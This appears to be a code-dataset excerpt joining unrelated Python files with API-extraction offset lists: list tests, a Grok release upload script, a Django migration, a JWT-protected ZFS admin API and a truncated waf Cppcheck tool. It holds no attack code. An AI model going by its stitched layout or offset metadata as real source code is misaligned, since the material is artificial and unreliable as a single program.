    # A shift as large as the list leaves nothing to pair.
    assert_that(List([1, 2]).zip_shift(2), equal_to([]))
    assert_that(List([1, 2, 3]).zip_shift(2), equal_to([(1, 3)]))
    assert_that(List([1, 2, 3]).zip_shift(1), equal_to([(1, 2), (2, 3)]))
| [
"mc.Nothing",
"mc.List",
"nose.tools.eq_",
"mc.Some"
] | [((1160, 1182), 'nose.tools.eq_', 'eq_', (['actual', '{9, 8, 7}'], {}), '(actual, {9, 8, 7})\n', (1163, 1182), False, 'from nose.tools import eq_\n'), ((812, 827), 'mc.List', 'List', (['[5, 6, 7]'], {}), '([5, 6, 7])\n', (816, 827), False, 'from mc import List, Some, Nothing, add\n'), ((1083, 1098), 'mc.List', 'List', (['[9, 8, 7]'], {}), '([9, 8, 7])\n', (1087, 1098), False, 'from mc import List, Some, Nothing, add\n'), ((1492, 1501), 'mc.Nothing', 'Nothing', ([], {}), '()\n', (1499, 1501), False, 'from mc import List, Some, Nothing, add\n'), ((1637, 1644), 'mc.Some', 'Some', (['(6)'], {}), '(6)\n', (1641, 1644), False, 'from mc import List, Some, Nothing, add\n'), ((1705, 1717), 'mc.List', 'List', (['[1, 2]'], {}), '([1, 2])\n', (1709, 1717), False, 'from mc import List, Some, Nothing, add\n'), ((1720, 1734), 'mc.List', 'List', (["['3', 4]"], {}), "(['3', 4])\n", (1724, 1734), False, 'from mc import List, Some, Nothing, add\n'), ((1745, 1765), 'mc.List', 'List', (["[1, 2, '3', 4]"], {}), "([1, 2, '3', 4])\n", (1749, 1765), False, 'from mc import List, Some, Nothing, add\n'), ((1870, 1906), 'mc.List', 'List', (["[(0, 'A'), (1, 'C'), (2, 'D')]"], {}), "([(0, 'A'), (1, 'C'), (2, 'D')])\n", (1874, 1906), False, 'from mc import List, Some, Nothing, add\n'), ((120, 135), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (124, 135), False, 'from mc import List, Some, Nothing, add\n'), ((205, 217), 'mc.List', 'List', (['[1, 3]'], {}), '([1, 3])\n', (209, 217), False, 'from mc import List, Some, Nothing, add\n'), ((303, 318), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (307, 318), False, 'from mc import List, Some, Nothing, add\n'), ((381, 396), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (385, 396), False, 'from mc import List, Some, Nothing, add\n'), ((474, 498), 'mc.List', 'List', (['[1, 2, 3, 4, 5, 6]'], {}), '([1, 2, 3, 4, 5, 6])\n', (478, 498), False, 'from mc import List, Some, Nothing, add\n'), ((606, 621), 'mc.List', 'List', 
(['[5, 6, 7]'], {}), '([5, 6, 7])\n', (610, 621), False, 'from mc import List, Some, Nothing, add\n'), ((694, 716), 'mc.List', 'List', (['[(5, 6), (7, 8)]'], {}), '([(5, 6), (7, 8)])\n', (698, 716), False, 'from mc import List, Some, Nothing, add\n'), ((914, 929), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (918, 929), False, 'from mc import List, Some, Nothing, add\n'), ((1253, 1265), 'mc.List', 'List', (['[1, 2]'], {}), '([1, 2])\n', (1257, 1265), False, 'from mc import List, Some, Nothing, add\n'), ((1450, 1458), 'mc.List', 'List', (['[]'], {}), '([])\n', (1454, 1458), False, 'from mc import List, Some, Nothing, add\n'), ((1584, 1599), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (1588, 1599), False, 'from mc import List, Some, Nothing, add\n'), ((1825, 1846), 'mc.List', 'List', (["['A', 'C', 'D']"], {}), "(['A', 'C', 'D'])\n", (1829, 1846), False, 'from mc import List, Some, Nothing, add\n'), ((1969, 1985), 'mc.List', 'List', (["['1', '2']"], {}), "(['1', '2'])\n", (1973, 1985), False, 'from mc import List, Some, Nothing, add\n'), ((2066, 2074), 'mc.List', 'List', (['[]'], {}), '([])\n', (2070, 2074), False, 'from mc import List, Some, Nothing, add\n'), ((2148, 2157), 'mc.List', 'List', (['[1]'], {}), '([1])\n', (2152, 2157), False, 'from mc import List, Some, Nothing, add\n'), ((2240, 2255), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (2244, 2255), False, 'from mc import List, Some, Nothing, add\n'), ((2341, 2356), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (2345, 2356), False, 'from mc import List, Some, Nothing, add\n'), ((2437, 2452), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (2441, 2452), False, 'from mc import List, Some, Nothing, add\n'), ((2525, 2537), 'mc.List', 'List', (['[1, 2]'], {}), '([1, 2])\n', (2529, 2537), False, 'from mc import List, Some, Nothing, add\n'), ((2625, 2637), 'mc.List', 'List', (['[1, 2]'], {}), '([1, 2])\n', (2629, 2637), False, 'from mc import List, Some, 
Nothing, add\n'), ((2697, 2709), 'mc.List', 'List', (['[1, 2]'], {}), '([1, 2])\n', (2701, 2709), False, 'from mc import List, Some, Nothing, add\n'), ((2764, 2779), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (2768, 2779), False, 'from mc import List, Some, Nothing, add\n'), ((2838, 2853), 'mc.List', 'List', (['[1, 2, 3]'], {}), '([1, 2, 3])\n', (2842, 2853), False, 'from mc import List, Some, Nothing, add\n'), ((776, 791), 'mc.List', 'List', (['[5, 6, 7]'], {}), '([5, 6, 7])\n', (780, 791), False, 'from mc import List, Some, Nothing, add\n')] |
import sys
import re
import os
import commands
HOST = 'grok.zope.org'
RELEASEINFOPATH = '/var/www/html/grok/releaseinfo'
def _upload_gtk_versions(packageroot, version):
    """Create the remote releaseinfo directory for *version* and upload grok.cfg.

    Shells out to ``ssh`` and ``scp`` against HOST/RELEASEINFOPATH; each
    command line and its combined output are printed for operator feedback.
    """
    # The original used the Python-2-only ``commands`` module while already
    # using print() as a function; ``subprocess.getoutput`` is the drop-in
    # Python 3 equivalent.  Fall back to ``commands`` when running on py2.
    try:
        from subprocess import getoutput
    except ImportError:  # Python 2
        from commands import getoutput
    # Create the releaseinfo directory for this version.
    cmd = 'ssh %s "mkdir %s/%s"' % (HOST, RELEASEINFOPATH, version)
    print(cmd + '\n')
    print(getoutput(cmd))
    # ``scp`` the file to the given destination.
    versions_filename = os.path.join(packageroot, 'grok.cfg')
    cmd = 'scp %s %s:%s/%s/versions.cfg' % (
        versions_filename, HOST, RELEASEINFOPATH, version)
    print(cmd + '\n')
    print(getoutput(cmd))
def upload_entrypoint(data):
    """Release entry point: upload version info only for groktoolkit itself.

    Any other package that happens to pull in this hook is silently skipped.
    """
    if data['name'] == 'groktoolkit':
        _upload_gtk_versions(data['workingdir'], data['version'])
def upload_gtk_versions():
    """Command-line entry point: upload versions for cwd using argv[1] as version."""
    # Both inputs are taken from the process environment -- acknowledged ugly.
    _upload_gtk_versions(os.getcwd(), sys.argv[1])
| [
"commands.getoutput",
"os.path.join",
"os.getcwd"
] | [((426, 463), 'os.path.join', 'os.path.join', (['packageroot', '"""grok.cfg"""'], {}), "(packageroot, 'grok.cfg')\n", (438, 463), False, 'import os\n'), ((988, 999), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (997, 999), False, 'import os\n'), ((328, 351), 'commands.getoutput', 'commands.getoutput', (['cmd'], {}), '(cmd)\n', (346, 351), False, 'import commands\n'), ((600, 623), 'commands.getoutput', 'commands.getoutput', (['cmd'], {}), '(cmd)\n', (618, 623), False, 'import commands\n')] |
# Generated by Django 3.1 on 2020-12-25 15:24
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration (see header): alters a batch of optional
    # CharFields on the ``uzytkownik`` model -- presumably refreshing
    # help_text/verbose_name translations; confirm against 0019.
    dependencies = [
        ('obywatele', '0019_auto_20201225_1621'),
    ]

    operations = [
        migrations.AlterField(
            model_name='uzytkownik',
            name='business',
            field=models.CharField(blank=True, help_text='If you are running a business', max_length=200, null=True, verbose_name='Business'),
        ),
        migrations.AlterField(
            model_name='uzytkownik',
            name='city',
            field=models.CharField(blank=True, help_text='Where you are spending most of your time', max_length=100, null=True, verbose_name='City'),
        ),
        migrations.AlterField(
            model_name='uzytkownik',
            name='fb',
            field=models.CharField(blank=True, help_text='Link to Facebook profile', max_length=500, null=True, verbose_name='Facebook'),
        ),
        migrations.AlterField(
            model_name='uzytkownik',
            name='for_sale',
            field=models.CharField(blank=True, help_text='Stuff you have for sale', max_length=500, null=True, verbose_name='For sale'),
        ),
        migrations.AlterField(
            model_name='uzytkownik',
            name='hobby',
            field=models.CharField(blank=True, help_text='Hobbies you have', max_length=200, null=True, verbose_name='Hobby'),
        ),
        migrations.AlterField(
            model_name='uzytkownik',
            name='i_need',
            field=models.CharField(blank=True, help_text='What do you need', max_length=500, null=True, verbose_name='I need'),
        ),
        migrations.AlterField(
            model_name='uzytkownik',
            name='job',
            field=models.CharField(blank=True, help_text='Your profession', max_length=500, null=True, verbose_name='Job'),
        ),
        migrations.AlterField(
            model_name='uzytkownik',
            name='knowledge',
            field=models.CharField(blank=True, help_text='Knowledge you have', max_length=500, null=True, verbose_name='Knowledge'),
        ),
        migrations.AlterField(
            model_name='uzytkownik',
            name='other',
            field=models.CharField(blank=True, help_text='Other things about worth mentioning', max_length=500, null=True, verbose_name='Other'),
        ),
        migrations.AlterField(
            model_name='uzytkownik',
            name='responsibilities',
            field=models.CharField(blank=True, help_text='Tasks performed in our group', max_length=2000, null=True, verbose_name='Responsibilities'),
        ),
        migrations.AlterField(
            model_name='uzytkownik',
            name='skills',
            field=models.CharField(blank=True, help_text='What practical skills do you have', max_length=500, null=True, verbose_name='Skills'),
        ),
        migrations.AlterField(
            model_name='uzytkownik',
            name='to_borrow',
            field=models.CharField(blank=True, help_text='Stuff you can borrow to others', max_length=500, null=True, verbose_name='To borrow'),
        ),
        migrations.AlterField(
            model_name='uzytkownik',
            name='to_give_away',
            field=models.CharField(blank=True, help_text='Things you are willing to give away for free', max_length=2000, null=True, verbose_name='To give away'),
        ),
        migrations.AlterField(
            model_name='uzytkownik',
            name='want_to_learn',
            field=models.CharField(blank=True, help_text='Things you would like to learn', max_length=500, null=True, verbose_name='I want to learn'),
        ),
    ]
| [
"django.db.models.CharField"
] | [((342, 469), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""If you are running a business"""', 'max_length': '(200)', 'null': '(True)', 'verbose_name': '"""Business"""'}), "(blank=True, help_text='If you are running a business',\n max_length=200, null=True, verbose_name='Business')\n", (358, 469), False, 'from django.db import migrations, models\n'), ((589, 728), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Where you are spending most of your time"""', 'max_length': '(100)', 'null': '(True)', 'verbose_name': '"""City"""'}), "(blank=True, help_text=\n 'Where you are spending most of your time', max_length=100, null=True,\n verbose_name='City')\n", (605, 728), False, 'from django.db import migrations, models\n'), ((841, 963), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Link to Facebook profile"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""Facebook"""'}), "(blank=True, help_text='Link to Facebook profile',\n max_length=500, null=True, verbose_name='Facebook')\n", (857, 963), False, 'from django.db import migrations, models\n'), ((1087, 1208), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Stuff you have for sale"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""For sale"""'}), "(blank=True, help_text='Stuff you have for sale',\n max_length=500, null=True, verbose_name='For sale')\n", (1103, 1208), False, 'from django.db import migrations, models\n'), ((1329, 1440), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Hobbies you have"""', 'max_length': '(200)', 'null': '(True)', 'verbose_name': '"""Hobby"""'}), "(blank=True, help_text='Hobbies you have', max_length=200,\n null=True, verbose_name='Hobby')\n", (1345, 1440), False, 'from django.db import migrations, models\n'), ((1562, 1674), 
'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""What do you need"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""I need"""'}), "(blank=True, help_text='What do you need', max_length=500,\n null=True, verbose_name='I need')\n", (1578, 1674), False, 'from django.db import migrations, models\n'), ((1793, 1901), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Your profession"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""Job"""'}), "(blank=True, help_text='Your profession', max_length=500,\n null=True, verbose_name='Job')\n", (1809, 1901), False, 'from django.db import migrations, models\n'), ((2026, 2143), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Knowledge you have"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""Knowledge"""'}), "(blank=True, help_text='Knowledge you have', max_length=500,\n null=True, verbose_name='Knowledge')\n", (2042, 2143), False, 'from django.db import migrations, models\n'), ((2264, 2399), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Other things about worth mentioning"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""Other"""'}), "(blank=True, help_text=\n 'Other things about worth mentioning', max_length=500, null=True,\n verbose_name='Other')\n", (2280, 2399), False, 'from django.db import migrations, models\n'), ((2526, 2661), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Tasks performed in our group"""', 'max_length': '(2000)', 'null': '(True)', 'verbose_name': '"""Responsibilities"""'}), "(blank=True, help_text='Tasks performed in our group',\n max_length=2000, null=True, verbose_name='Responsibilities')\n", (2542, 2661), False, 'from django.db import migrations, models\n'), ((2783, 2912), 'django.db.models.CharField', 'models.CharField', 
([], {'blank': '(True)', 'help_text': '"""What practical skills do you have"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""Skills"""'}), "(blank=True, help_text='What practical skills do you have',\n max_length=500, null=True, verbose_name='Skills')\n", (2799, 2912), False, 'from django.db import migrations, models\n'), ((3037, 3166), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Stuff you can borrow to others"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""To borrow"""'}), "(blank=True, help_text='Stuff you can borrow to others',\n max_length=500, null=True, verbose_name='To borrow')\n", (3053, 3166), False, 'from django.db import migrations, models\n'), ((3294, 3447), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Things you are willing to give away for free"""', 'max_length': '(2000)', 'null': '(True)', 'verbose_name': '"""To give away"""'}), "(blank=True, help_text=\n 'Things you are willing to give away for free', max_length=2000, null=\n True, verbose_name='To give away')\n", (3310, 3447), False, 'from django.db import migrations, models\n'), ((3570, 3705), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Things you would like to learn"""', 'max_length': '(500)', 'null': '(True)', 'verbose_name': '"""I want to learn"""'}), "(blank=True, help_text='Things you would like to learn',\n max_length=500, null=True, verbose_name='I want to learn')\n", (3586, 3705), False, 'from django.db import migrations, models\n')] |
import uuid
from datetime import datetime, timedelta
from controllers import zfsController
import jwt
import pam
import render
JWT_SECRET = "<KEY>"
JWT_ALGORITHM = "HS256"
JWT_EXP_DELTA_SECONDS = 4300
async def index(request):
    """Catch-all root handler: nothing is served at '/'."""
    # Every other handler in this module awaits render.json; returning the
    # bare coroutine here would hand the framework a non-response object.
    return await render.json({'error': 'nothing to see here...'}, 200)
async def auth(request):
    """Authenticate against local PAM and issue a JWT on success.

    Expects JSON with 'username' and 'password'.  Returns ``{'token': ...}``
    on success, a 403 on bad credentials, or a 200 error payload when the
    request body is malformed (preserved from the original error handling).
    """
    try:
        data = await request.json()
        user = data['username']
        password = data['password']
        if pam.authenticate(user, password):
            payload = {
                'user': user,
                'session_id': str(uuid.uuid4()),
                'exp': datetime.utcnow() + timedelta(seconds=JWT_EXP_DELTA_SECONDS)
            }
            # NOTE: .decode('utf-8') below assumes PyJWT < 2.0, where
            # encode() returns bytes -- confirm the pinned dependency.
            jwt_token = jwt.encode(payload, JWT_SECRET, JWT_ALGORITHM)
            return await render.json({'token': jwt_token.decode('utf-8')}, 200)
        else:
            # Previously returned None, which produced an unhandled server
            # error instead of an authentication failure response.
            return await render.json({'error': 'Invalid credentials'}, 403)
    except Exception as e:
        return await render.json({'error': str(e)}, 200)
async def check_token(request):
    """Validate the JWT from the Authorization header.

    Returns the token's session id when the signature and expiry check out,
    and ``False`` for a missing, malformed or expired token.
    """
    token = request.headers.get('Authorization', None)
    try:
        claims = jwt.decode(token, JWT_SECRET, algorithms=[JWT_ALGORITHM])
    except (jwt.DecodeError, jwt.ExpiredSignatureError):
        return False
    return claims['session_id']
async def create_pool(request):
    """Create a new ZFS pool (JSON body: 'name', 'raid', 'devices').

    Requires a valid JWT in the Authorization header; answers 403 otherwise.
    """
    check = await check_token(request)
    if check:
        try:
            data = await request.json()
            res = await zfsController.create_pool(data['name'], data['raid'], data['devices'])
            return await render.json({"success": res}, 200)
        except Exception as e:
            print(str(e))
            # Report failures as 500 instead of 200 so clients can tell
            # success from failure (consistent with add_disk/get_io_status).
            return await render.raw({'error': str(e)}, 500)
    else:
        return await render.json({'error': 'Invalid or expired token'}, 403)
async def delete_pool(request):
    """Destroy an existing ZFS pool (JSON body: 'name').

    Requires a valid JWT in the Authorization header; answers 403 otherwise.
    """
    check = await check_token(request)
    if check:
        try:
            data = await request.json()
            res = await zfsController.delete_pool(data['name'])
            return await render.json({"success": res}, 200)
        except Exception as e:
            print(str(e))
            # 500 (not 200) on failure, consistent with the other handlers.
            return await render.raw({'error': str(e)}, 500)
    else:
        return await render.json({'error': 'Invalid or expired token'}, 403)
async def check_status(request):
    """Return the ZFS pool status.

    Requires a valid JWT in the Authorization header; answers 403 otherwise.
    """
    check = await check_token(request)
    if check:
        try:
            res = await zfsController.get_status()
            return await render.json({'msg': res}, 200)
        except Exception as e:
            print(str(e))
            # Previously fell through returning None (server error);
            # return an explicit 500 payload instead.
            return await render.raw({'error': str(e)}, 500)
    else:
        # Previously missing: invalid tokens silently returned None.
        return await render.json({'error': 'Invalid or expired token'}, 403)
async def get_storage_info(request):
    """Return disk/storage information.

    Requires a valid JWT in the Authorization header; answers 403 otherwise.
    """
    check = await check_token(request)
    if check:
        try:
            res = await zfsController.get_disk_info()
            return await render.json(res, 200)
        except Exception as e:
            print(str(e))
            return await render.raw({'error': str(e)}, 500)
    else:
        # Previously missing: invalid tokens silently returned None.
        return await render.json({'error': 'Invalid or expired token'}, 403)
async def get_io_status(request):
    """Return ZFS I/O statistics.

    Requires a valid JWT in the Authorization header; answers 403 otherwise.
    """
    check = await check_token(request)
    if check:
        try:
            res = await zfsController.get_IO_stats()
            return await render.json({'msg': res}, 200)
        except Exception as e:
            print(str(e))
            return await render.raw({'error': str(e)}, 500)
    else:
        # Previously missing: invalid tokens silently returned None.
        return await render.json({'error': 'Invalid or expired token'}, 403)
async def add_disk(request):
    """Attach a new device to an existing pool (JSON body: 'pool', 'device').

    Requires a valid JWT in the Authorization header; answers 403 otherwise.
    """
    if not await check_token(request):
        return await render.json({'error': 'Invalid or expired token'}, 403)
    try:
        body = await request.json()
        result = await zfsController.add_new_disk(body['pool'], body['device'])
        return await render.json({"success": result}, 200)
    except Exception as exc:
        print(str(exc))
        return await render.raw({'error': str(exc)}, 500)
async def add_spare_disk(request):
    """Attach a hot-spare device to a pool (JSON body: 'pool', 'device').

    Requires a valid JWT in the Authorization header; answers 403 otherwise.
    """
    check = await check_token(request)
    if check:
        try:
            data = await request.json()
            res = await zfsController.add_spare_disk(data['pool'], data['device'])
            return await render.json({"success": res}, 200)
        except Exception as e:
            print(str(e))
            # 500 (not 200) on failure, consistent with the other handlers.
            return await render.raw({'error': str(e)}, 500)
    else:
        return await render.json({'error': 'Invalid or expired token'}, 403)
async def replace_disk(request):
    """Replace a pool device (JSON body: 'pool', 'old_device', 'new_device').

    Requires a valid JWT in the Authorization header; answers 403 otherwise.
    """
    check = await check_token(request)
    if check:
        try:
            data = await request.json()
            res = await zfsController.replace_disk(data['pool'], data['old_device'], data['new_device'])
            return await render.json({"success": res}, 200)
        except Exception as e:
            print(str(e))
            # 500 (not 200) on failure, consistent with the other handlers.
            return await render.raw({'error': str(e)}, 500)
    else:
        return await render.json({'error': 'Invalid or expired token'}, 403)
async def set_mountpoint(request):
    """Set a pool's mountpoint (JSON body: 'mountpoint', 'pool').

    Requires a valid JWT in the Authorization header; answers 403 otherwise.
    """
    check = await check_token(request)
    if check:
        try:
            data = await request.json()
            res = await zfsController.set_mountpoint(data['mountpoint'], data['pool'])
            return await render.json({"success": res}, 200)
        except Exception as e:
            print(str(e))
            # 500 (not 200) on failure, consistent with the other handlers.
            return await render.raw({'error': str(e)}, 500)
    else:
        return await render.json({'error': 'Invalid or expired token'}, 403)
| [
"jwt.decode",
"controllers.zfsController.set_mountpoint",
"controllers.zfsController.create_pool",
"controllers.zfsController.get_disk_info",
"datetime.datetime.utcnow",
"controllers.zfsController.get_status",
"controllers.zfsController.add_new_disk",
"controllers.zfsController.add_spare_disk",
"con... | [((242, 295), 'render.json', 'render.json', (["{'error': 'nothing to see here...'}", '(200)'], {}), "({'error': 'nothing to see here...'}, 200)\n", (253, 295), False, 'import render\n'), ((447, 479), 'pam.authenticate', 'pam.authenticate', (['user', 'password'], {}), '(user, password)\n', (463, 479), False, 'import pam\n'), ((1079, 1140), 'jwt.decode', 'jwt.decode', (['jwt_token', 'JWT_SECRET'], {'algorithms': '[JWT_ALGORITHM]'}), '(jwt_token, JWT_SECRET, algorithms=[JWT_ALGORITHM])\n', (1089, 1140), False, 'import jwt\n'), ((706, 752), 'jwt.encode', 'jwt.encode', (['payload', 'JWT_SECRET', 'JWT_ALGORITHM'], {}), '(payload, JWT_SECRET, JWT_ALGORITHM)\n', (716, 752), False, 'import jwt\n'), ((1699, 1754), 'render.json', 'render.json', (["{'error': 'Invalid or expired token'}", '(403)'], {}), "({'error': 'Invalid or expired token'}, 403)\n", (1710, 1754), False, 'import render\n'), ((2167, 2222), 'render.json', 'render.json', (["{'error': 'Invalid or expired token'}", '(403)'], {}), "({'error': 'Invalid or expired token'}, 403)\n", (2178, 2222), False, 'import render\n'), ((3565, 3620), 'render.json', 'render.json', (["{'error': 'Invalid or expired token'}", '(403)'], {}), "({'error': 'Invalid or expired token'}, 403)\n", (3576, 3620), False, 'import render\n'), ((4055, 4110), 'render.json', 'render.json', (["{'error': 'Invalid or expired token'}", '(403)'], {}), "({'error': 'Invalid or expired token'}, 403)\n", (4066, 4110), False, 'import render\n'), ((4565, 4620), 'render.json', 'render.json', (["{'error': 'Invalid or expired token'}", '(403)'], {}), "({'error': 'Invalid or expired token'}, 403)\n", (4576, 4620), False, 'import render\n'), ((5059, 5114), 'render.json', 'render.json', (["{'error': 'Invalid or expired token'}", '(403)'], {}), "({'error': 'Invalid or expired token'}, 403)\n", (5070, 5114), False, 'import render\n'), ((1420, 1490), 'controllers.zfsController.create_pool', 'zfsController.create_pool', (["data['name']", "data['raid']", 
"data['devices']"], {}), "(data['name'], data['raid'], data['devices'])\n", (1445, 1490), False, 'from controllers import zfsController\n'), ((1516, 1550), 'render.json', 'render.json', (["{'success': res}", '(200)'], {}), "({'success': res}, 200)\n", (1527, 1550), False, 'import render\n'), ((1919, 1958), 'controllers.zfsController.delete_pool', 'zfsController.delete_pool', (["data['name']"], {}), "(data['name'])\n", (1944, 1958), False, 'from controllers import zfsController\n'), ((1984, 2018), 'render.json', 'render.json', (["{'success': res}", '(200)'], {}), "({'success': res}, 200)\n", (1995, 2018), False, 'import render\n'), ((2348, 2374), 'controllers.zfsController.get_status', 'zfsController.get_status', ([], {}), '()\n', (2372, 2374), False, 'from controllers import zfsController\n'), ((2400, 2430), 'render.json', 'render.json', (["{'msg': res}", '(200)'], {}), "({'msg': res}, 200)\n", (2411, 2430), False, 'import render\n'), ((2617, 2646), 'controllers.zfsController.get_disk_info', 'zfsController.get_disk_info', ([], {}), '()\n', (2644, 2646), False, 'from controllers import zfsController\n'), ((2672, 2693), 'render.json', 'render.json', (['res', '(200)'], {}), '(res, 200)\n', (2683, 2693), False, 'import render\n'), ((2937, 2965), 'controllers.zfsController.get_IO_stats', 'zfsController.get_IO_stats', ([], {}), '()\n', (2963, 2965), False, 'from controllers import zfsController\n'), ((2991, 3021), 'render.json', 'render.json', (["{'msg': res}", '(200)'], {}), "({'msg': res}, 200)\n", (3002, 3021), False, 'import render\n'), ((3300, 3356), 'controllers.zfsController.add_new_disk', 'zfsController.add_new_disk', (["data['pool']", "data['device']"], {}), "(data['pool'], data['device'])\n", (3326, 3356), False, 'from controllers import zfsController\n'), ((3382, 3416), 'render.json', 'render.json', (["{'success': res}", '(200)'], {}), "({'success': res}, 200)\n", (3393, 3416), False, 'import render\n'), ((3788, 3846), 
'controllers.zfsController.add_spare_disk', 'zfsController.add_spare_disk', (["data['pool']", "data['device']"], {}), "(data['pool'], data['device'])\n", (3816, 3846), False, 'from controllers import zfsController\n'), ((3872, 3906), 'render.json', 'render.json', (["{'success': res}", '(200)'], {}), "({'success': res}, 200)\n", (3883, 3906), False, 'import render\n'), ((4276, 4361), 'controllers.zfsController.replace_disk', 'zfsController.replace_disk', (["data['pool']", "data['old_device']", "data['new_device']"], {}), "(data['pool'], data['old_device'], data['new_device']\n )\n", (4302, 4361), False, 'from controllers import zfsController\n'), ((4382, 4416), 'render.json', 'render.json', (["{'success': res}", '(200)'], {}), "({'success': res}, 200)\n", (4393, 4416), False, 'import render\n'), ((4788, 4850), 'controllers.zfsController.set_mountpoint', 'zfsController.set_mountpoint', (["data['mountpoint']", "data['pool']"], {}), "(data['mountpoint'], data['pool'])\n", (4816, 4850), False, 'from controllers import zfsController\n'), ((4876, 4910), 'render.json', 'render.json', (["{'success': res}", '(200)'], {}), "({'success': res}, 200)\n", (4887, 4910), False, 'import render\n'), ((569, 581), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (579, 581), False, 'import uuid\n'), ((607, 624), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (622, 624), False, 'from datetime import datetime, timedelta\n'), ((627, 667), 'datetime.timedelta', 'timedelta', ([], {'seconds': 'JWT_EXP_DELTA_SECONDS'}), '(seconds=JWT_EXP_DELTA_SECONDS)\n', (636, 667), False, 'from datetime import datetime, timedelta\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @copyright © 2010 - 2021, Fraunhofer-Gesellschaft zur Foerderung der
# angewandten Forschung e.V. All rights reserved.
#
# BSD 3-Clause License
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# We kindly request you to use one or more of the following phrases to refer to
# foxBMS in your hardware, software, documentation or advertising materials:
#
# ″This product uses parts of foxBMS®″
#
# ″This product includes parts of foxBMS®″
#
# ″This product is derived from foxBMS®″
"""Implements a waf tool to configure Cppcheck
For information on Cppcheck see http://cppcheck.sourceforge.net/.
"""
import os
from waflib import Utils, Task, TaskGen, Logs
class cppcheck(Task.Task):  # pylint: disable=invalid-name
    """Call cppcheck"""

    #: str: color in which the command line is displayed in the terminal
    color = "GREEN"
    #: str: Cppcheck handles the need for a re-run, so always run this task
    always_run = True
    # NOTE(review): the trailing comma makes this a 1-tuple containing one
    # implicitly concatenated string, not a plain str -- confirm that waf's
    # Task metaclass accepts a tuple here, otherwise drop the comma.
    run_str = (
        "${CPPCHECK} --project=${CPPCHECK_MAIN_PROJECT_FILE} --cppcheck-build-dir=. "
        "--exitcode-suppressions=${CPPCHECK_RULE_SUPPRESSION_FILE} -f "
        "--std=c99 --enable=warning,style,performance,portability,information,unusedFunction "
        "--addon=${CPPCHECK_ADDON_CNF_MISRA} --error-exitcode=${CPPCHECK_EXITCODE_FAIL} "
        "--suppressions-list=${CPPCHECK_RULE_SUPPRESSION_FILE}",
    )
    """str: string to be interpolated to create the command line to run
    cppcheck."""
@TaskGen.feature("cppcheck")
def add_cppcheck_task(self):
    """Task creator for cppcheck.

    Runs for every task generator carrying the ``cppcheck`` feature and
    schedules one ``cppcheck`` task for it.
    """
    self.create_task("cppcheck")
def options(opt):
    """Defines options that can be passed to cppcheck tool"""
    # Candidate directories that may hold the MISRA-C rules text.
    if Utils.is_win32:
        doc_paths = [
            os.path.join(os.path.expanduser("~"), "Documents", "MISRA-C"),
